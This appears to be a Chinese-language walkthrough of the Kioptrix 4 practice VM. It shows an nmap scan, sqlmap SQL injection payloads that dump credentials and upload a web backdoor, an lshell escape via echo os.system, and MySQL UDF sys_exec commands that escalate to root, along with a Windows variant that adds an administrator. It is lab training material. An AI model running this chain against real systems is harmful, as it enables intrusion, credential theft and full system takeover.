root@kali:~# nmap -sS -A 10.32.58.187 Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-17 01:57 EDT Nmap scan report for 10.32.58.187 Host is up (0.00037s latency). Not shown: 566 closed ports, 430 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0) | ssh-hostkey: | 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA) |_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA) 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) |_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch |_http-title: Site doesn't have a title (text/html). 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP) MAC Address: 00:0C:29:38:2D:6F (VMware) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.33 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 21.81 seconds
从扫描结果可以得到,开发以下端口信息
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
sqlmap identified the following injection point(s) with a total of 253 HTTP(s) requests: --- Parameter: mypassword (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: myusername=admin&mypassword=-8260' OR 6555=6555#&Submit=Login
Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: myusername=admin&mypassword=123' OR SLEEP(5)-- UeQF&Submit=Login --- [02:00:45] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 8.04 (Hardy Heron) web application technology: PHP 5.2.4, Apache 2.2.8 back-end DBMS: MySQL >= 5.0.12 [02:00:45] [INFO] fetching current user [02:00:45] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [02:00:45] [INFO] retrieved: root@localhost current user: 'root@localhost' [02:00:45] [INFO] fetching current database [02:00:45] [INFO] retrieved: members current database: 'members' [02:00:45] [INFO] testing if current user is DBA [02:00:45] [INFO] fetching current user current user is DBA: True [02:00:45] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.32.58.187'
[*] shutting down at 02:00:45
通过注入得到用户名和密码
1 2 3 4 5 6 7 8 9
Database: members Table: members [2 entries] +----+----------+-----------------------+ | id | username | password | +----+----------+-----------------------+ | 1 | john | MyNameIsJohn | | 2 | robert | ADGAdsafdfwt4gadfga== | +----+----------+-----------------------+
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 02:09:06
[02:09:06] [INFO] resuming back-end DBMS 'mysql' [02:09:06] [INFO] testing connection to the target URL [02:09:06] [INFO] heuristics detected web page charset 'ascii' sqlmap resumed the following injection point(s) from stored session: --- Parameter: mypassword (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: myusername=admin&mypassword=-8260' OR 6555=6555#&Submit=Login
Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: myusername=admin&mypassword=123' OR SLEEP(5)-- UeQF&Submit=Login --- [02:09:06] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 8.04 (Hardy Heron) web application technology: PHP 5.2.4, Apache 2.2.8 back-end DBMS: MySQL >= 5.0.12 [02:09:06] [INFO] going to use a web backdoor for command prompt [02:09:06] [INFO] fingerprinting the back-end DBMS operating system [02:09:06] [INFO] the back-end DBMS operating system is Linux which web application language does the web server support? [1] ASP [2] ASPX [3] JSP [4] PHP (default) > 4 [02:09:08] [INFO] retrieved the web server document root: '/var/www' [02:09:08] [INFO] retrieved web server absolute paths: '/var/www/checklogin.php' [02:09:08] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method [02:09:08] [INFO] the file stager has been successfully uploaded on '/var/www/' - http://10.32.58.187:80/tmpuadle.php [02:09:08] [WARNING] unable to upload the file through the web file stager to '/var/www/' [02:09:08] [WARNING] backdoor has not been successfully uploaded through the file stager possibly because the user running the web server process has not write privileges over the folder where the user running the DBMS process was able to upload the file stager or because the DBMS and web server sit on different servers do you want to try the same method used for the file stager? [Y/n] [02:09:09] [INFO] the backdoor has been successfully uploaded on '/var/www/' - http://10.32.58.187:80/tmpbcphh.php [02:09:09] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER os-shell> id do you want to retrieve the command standard output? [Y/n/a] command standard output: 'uid=33(www-data) gid=33(www-data) groups=33(www-data)' os-shell> whoami do you want to retrieve the command standard output? [Y/n/a] command standard output: 'www-data' os-shell> cat checklogin.php do you want to retrieve the command standard output? [Y/n/a] command standard output: --- <?php ob_start(); $host="localhost"; // Host name $username="root"; // Mysql username $password=""; // Mysql password $db_name="members"; // Database name $tbl_name="members"; // Table name
但是权限很小。但是得到了数据库的账号密码。
通过SSH连接
利用SQL注入得到的用户名密码SSH登录。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
root@kali:~# ssh john@10.32.58.187 The authenticity of host '10.32.58.187 (10.32.58.187)' can't be established. RSA key fingerprint is SHA256:3fqlLtTAindnY7CGwxoXJ9M2rQF6nn35SFMTVv56lww. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '10.32.58.187' (RSA) to the list of known hosts. john@10.32.58.187's password: Welcome to LigGoat Security Systems - We are Watching == Welcome LigGoat Employee == LigGoat Shell is in place so you don't screw up Type '?' or 'help' to get the list of allowed commands john:~$ id *** unknown command: id john:~$ ? cd clear echo exit help ll lpath ls john:~$ help help Limited Shell (lshell) limited help. Cheers.
从这里我们可以利用的命令有
1
cd clear echo exit help ll lpath ls
重点其中有一个是echo。
我们可以利用他得到一个bash交互shell
1 2 3
john:~$ echo os.system('/bin/bash') john@Kioptrix4:~$ id uid=1001(john) gid=1001(john) groups=1001(john)
john@Kioptrix4:~$ mysql -u root -p Enter password: Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 3520 Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> status; -------------- mysql Ver 14.12 Distrib 5.0.51a, for debian-linux-gnu (i486) using readline 5.2
Connection id: 3520 Current database: Current user: root@localhost SSL: Not in use Current pager: stdout Using outfile: '' Using delimiter: ; Server version: 5.0.51a-3ubuntu5.4 (Ubuntu) Protocol version: 10 Connection: Localhost via UNIX socket Server characterset: latin1 Db characterset: latin1 Client characterset: latin1 Conn. characterset: latin1 UNIX socket: /var/run/mysqld/mysqld.sock Uptime: 1 hour 10 min 47 sec
尝试mysql udf 提权。
在Windows环境下,执行命令
1 2 3 4 5 6 7
USE mysql; CREATE TABLE npn(line blob); INSERT INTO npn values(load_file('C://xampplite//htdocs//mail//lib_mysqludf_sys.dll')); SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll'; CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll'; SELECT sys_exec("net user npn npn12345678 /add"); SELECT sys_exec("net localgroup Administrators npn /add");
mysql> use mysql; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A
Database changed mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so'; ERROR 1125 (HY000): Function 'sys_exec' already exists mysql> select sys_exec('id > /tmp/out; chown john.john /tmp/out'); ERROR 2006 (HY000): MySQL server has gone away No connection. Trying to reconnect... Connection id: 1 Current database: mysql
+-----------------------------------------------------+ | sys_exec('id > /tmp/out; chown john.john /tmp/out') | +-----------------------------------------------------+ | NULL | +-----------------------------------------------------+ 1 row in set (0.00 sec)
mysql> SELECT sys_exec('usermod -a -G admin'); ERROR 2013 (HY000): Lost connection to MySQL server during query mysql> SELECT sys_exec('usermod -a -G admin john'); ERROR 2006 (HY000): MySQL server has gone away No connection. Trying to reconnect... Connection id: 1 Current database: mysql
+--------------------------------------+ | sys_exec('usermod -a -G admin john') | +--------------------------------------+ | NULL | +--------------------------------------+ 1 row in set (0.07 sec)
利用SELECT sys_exec('usermod -a -G admin');将john加入管理员组
1 2 3 4 5 6
john@Kioptrix4:/tmp$ sudo su [sudo] password for john: root@Kioptrix4:/tmp# id uid=0(root) gid=0(root) groups=0(root) root@Kioptrix4:/tmp# whoami root
